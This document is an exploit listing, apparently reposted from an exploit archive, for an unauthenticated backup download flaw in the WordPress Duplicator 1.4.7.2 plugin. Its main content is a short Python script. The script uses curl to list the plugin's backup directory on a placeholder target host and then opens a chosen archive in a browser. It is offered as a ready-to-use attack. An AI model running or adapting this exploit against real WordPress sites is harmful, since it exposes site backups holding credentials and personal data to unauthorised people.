Exploit for WordPress Duplicator 1.4.7.2 Backup Disclosure

## https://sploitus.com/exploit?id=PACKETSTORM:168134
## Title: WordPress Plugin Duplicator 1.4.7.2 - Unauthenticated Backup Download  
## Author: nu11secur1ty  
## Date: 08.23.2022  
## Vendor: https://wordpress.org/  
## Software: https://wordpress.org/plugins/duplicator/  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2  
  
## Description:  
The WordPress Plugin Duplicator 1.4.7.2 suffers from Unauthenticated  
Backup Download, after an update from the 1.4.7.1 version.  
The attacker can download all archive information from the system by  
using this vulnerability!  
Status: CRITICAL  
  
[+] Exploit:  
  
```python  
#!/usr/bin/python  
# Author nu11secur1ty  
from selenium import webdriver  
import time  
import os  
  
print("Test if you can access the directory\n")  
time.sleep(5)  
os.system('curl http://pwned-host.com/wordpress/wp-content/backups-dup-lite/')  
target=input("Give the name of the archive...\n")  
driver = webdriver.Chrome()  
driver.get('http://pwned-host.com/wordpress/wp-content/backups-dup-lite/'  
+ target)  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin-1.4.7.2)  
  
## Proof and Exploit:  
[href](https://streamable.com/x0cvjh)